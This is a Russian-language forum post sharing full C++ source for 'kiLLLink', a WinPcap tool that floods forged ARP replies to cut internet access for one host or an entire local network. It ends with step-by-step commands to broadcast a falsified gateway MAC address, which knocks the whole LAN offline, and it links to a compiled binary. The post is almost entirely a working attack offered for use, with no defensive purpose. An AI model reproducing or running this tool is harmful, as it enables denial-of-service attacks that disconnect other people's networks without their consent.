Разрываем связь в локальной сети
Итак сидим мы в сетке, и хотим отрубить кому-нибудь инет... а может и ни кому-нибудь, а всей локальной сети. Суть заключается в посылке ARP ответов конкретной машине, или броадкаст для всей сети, шлется заведомо ложная информация. Реализация сделана с использованием winpcap библиотеки
Код:
---------------------------------------------------------------
main.cpp
---------------------------------------------------------------
#include <stdlib.h>
#include <stdio.h>
#include <pcap.h>
#define IPTOSBUFFERS 12
#pragma pack(1)
typedef struct _ARPPACKET
{
// ethernet header
BYTE dest_mac[6];
BYTE src_mac[6];
BYTE pack_type[2]; //0806 [arp]
// arp header
BYTE hw_type[2]; //0001 [ethernet]
BYTE proto_type[2]; //0800 [ip]
BYTE hw_proto_sizes[2]; //0604
BYTE opcode[2]; //0002 [reply]
BYTE sendermac[6];
BYTE senderip[4];
BYTE targetmac[6];
BYTE targetip[4];
// trailer
BYTE dummy[18];
}ARPPACKET;
#pragma pack()
ARPPACKET g_SpoofPacket;
char g_devicename[256];
int arph_discover(char *ip, char *mac_buff);
int astr_to_binstr(char *macstr, BYTE *pbinstr);
void ip_to_bin(char *ip, BYTE *buff);
void init_packet(ARPPACKET *p)
{
memset(p, 0, sizeof(ARPPACKET));
memcpy(p->pack_type, "\x08\x06", 2);
memcpy(p->hw_type, "\x00\x01", 2);
memcpy(p->proto_type, "\x08\x00", 2);
memcpy(p->hw_proto_sizes, "\x06\x04", 2);
memcpy(p->opcode, "\x00\x02", 2);
}
char *iptos(u_long in)
{
static char output[IPTOSBUFFERS][3*4+3+1];
static short which;
u_char *p;
p = (u_char *)∈
which = (which + 1 == IPTOSBUFFERS ? 0 : which + 1);
sprintf(output[which], "%d.%d.%d.%d", p[0], p[1], p[2], p[3]);
return output[which];
}
void ifprint(pcap_if_t *d)
{
pcap_addr_t *a;
a = d->addresses;
if(!a)
return;
if(a->addr->sa_family != 2)
return;
strcpy(g_devicename, d->name);
printf("[+] device found:\n");
if(d->description)
printf(" %s\n",d->description);
if(a->addr)
printf(" Address: %s\n",iptos(((struct sockaddr_in *)a->addr)->sin_addr.s_addr));
if(a->netmask)
printf(" Netmask: %s\n",iptos(((struct sockaddr_in *)a->netmask)->sin_addr.s_addr));
printf("\n");
}
int main(int argc, char **argv)
{
printf("\n -= kiLLLink (c) by sn0w =-\n");
printf("\n[+] killlink 0.1 is starting...\n detecting an attack source...\n");
//
// Retrieve device list...
//
pcap_if_t *alldevs;
pcap_if_t *d;
char errbuf[PCAP_ERRBUF_SIZE+1];
if(pcap_findalldevs(&alldevs, errbuf) == -1){
printf("[-] error in pcap_findalldevs: %s\n", errbuf);
return 1;
}
for(d=alldevs;d;d=d->next)
ifprint(d);
pcap_freealldevs(alldevs);
Sleep(300);
//
// prepare attack
//
pcap_t *fp;
/* Open the adapter */
if ((fp = pcap_open_live(g_devicename, // name of the device
65536, // portion of the packet to capture. It doesn't matter in this case
1, // promiscuous mode (nonzero means promiscuous)
1, // read timeout
errbuf // error buffer
)) == NULL){
printf("\n[-] unable to open the adapter. %s is not supported by WinPcap\n", g_devicename);
return 2;
}
// prepare static fields in the packet
init_packet(&g_SpoofPacket);
// show console
printf("[+] *** terminal console ready ***\n ******************************\n\n > ");
char command[400];
while(gets(command)){
// exit command
if(strncmp(command, "exit", 4)==0){
printf("[+] terminating session...\n\n");
goto end_pcap;
}
// aimhost
else if(strncmp(command, "aimhost", 7)==0){
char mac_buff[128];
DWORD time;
printf(" exploring... ");
time = GetTickCount();
if(!arph_discover(command+8,mac_buff)){
printf("nothing detected (host down?)\n\n");
goto end_loop;
}
printf("hardware detected at %s, %dmsec\n\n", mac_buff, GetTickCount()-time);
}
// setdest mac
else if(strncmp(command, "setmacdst", 9)==0){
BYTE binmac[8];
if(astr_to_binstr(command+10, binmac)){
memcpy(g_SpoofPacket.dest_mac, binmac, 6);
memcpy(g_SpoofPacket.targetmac, binmac, 6);
printf(" destination HW address setup done for %s\n\n", command+10);
}
}
// setsrc mac
else if(strncmp(command, "setmacsrc", 9)==0){
BYTE binmac[8];
if(astr_to_binstr(command+10, binmac)){
memcpy(g_SpoofPacket.src_mac, binmac, 6);
memcpy(g_SpoofPacket.sendermac, binmac, 6);
printf(" source HW address setup done for %s\n\n",command +10);
}
}
else if(strncmp(command, "setipsrc", 8)==0){
BYTE binip[8];
ip_to_bin(command+9, binip);
memcpy(g_SpoofPacket.senderip, binip, 4);
printf(" source address setup done for %s\n\n", command+9);
}
else if(strncmp(command, "setipdst", 8)==0){
BYTE binip[8];
ip_to_bin(command+9, binip);
memcpy(g_SpoofPacket.targetip, binip, 4);
printf(" destination address setup done for %s\n\n", command+9);
}
// send packet
else if(strncmp(command, "pushdata", 8)==0){
int delay = atoi(command+9);
printf(" generating packets now");
while(TRUE){
pcap_sendpacket(fp, (BYTE*)&g_SpoofPacket, sizeof(ARPPACKET));
printf(".");
Sleep(delay);
}
}
// default
else{
printf("[-] unrecognized command\n\n");
}
end_loop:
printf(" > ");
}
end_pcap:
pcap_close(fp);
return 0;
}
Код:
------------------------------------------------------------------
arphlp.cpp
------------------------------------------------------------------
#include <windows.h>
#include <stdio.h>
#include <iphlpapi.h>
#pragma comment(lib, "ws2_32")
#pragma comment(lib, "iphlpapi")
int arph_discover(char *ip, char *mac_buff)
{
IPAddr ipAddr;
BYTE bMac[6];
ULONG ulLen;
if(isalpha(ip[0])){// nb name
hostent *p = gethostbyname(ip);
if(!p)return 0;
//MessageBox(0,p->h_addr_list[0],0,0);
memcpy(&ipAddr,p->h_addr_list[0], 4);
}else{// ip
ipAddr = inet_addr(ip);
}
memset(bMac, 0xff, sizeof (bMac));
ulLen = sizeof(bMac);
if(SendARP(ipAddr, 0, (PULONG)bMac, &ulLen)!=NO_ERROR)
return 0;
size_t i, j;
PBYTE pbHexMac = (PBYTE)bMac;
// Convert the binary MAC address into human-readable
for (i = 0, j = 0; i < ulLen - 1; ++i)
j += sprintf (mac_buff + j, "%02X-", pbHexMac[i]);
sprintf (mac_buff + j, "%02X", pbHexMac[i]);
return 1;
}
int astr_to_binstr(char *macstr, BYTE *pbinstr)
{
unsigned int i = 0,j = 0;
bool shift=false;
char ch;
//Cant convert.......
if (!strlen(macstr)) return false;
while(strlen(macstr) > i){
if(isalnum(ch = macstr[i++])){
if(isalpha(ch)){
if(!shift ){
pbinstr[j] = (toupper(ch) - 'A'+10) << 4;
shift = true;
}
else{
pbinstr[j++] |= toupper(ch) - 'A'+10;
shift = false;
}
}
else { // if ch is numeric,
if(!shift){
pbinstr[j] = (ch - '0') << 4;
shift = true;
}
else {
pbinstr[j++] |= ch - '0';
shift = false;
}
}
}
}
return true;
}
void ip_to_bin(char *ip, BYTE *buff)
{
unsigned long addr;
addr = inet_addr(ip);
memcpy(buff, &addr, 4);
}
--------------------------------------------------
че делаем
отруб инет-гейтвея для всей сети:
aimhost inet_gateway
(получаем мак гейтвея)
setmacsrc мак_гейтвея_с_ошибкой_на_од у_цифру
setmacdst ff-ff-ff-ff-ff-ff
setipdst 255.255.255.255
setipsrc айпишник_гейтвея
pushdata 1000
все. локальная сеть сосет инет :)
рабочий бинарник - hppt://www.rapidshare.ru/247180 |
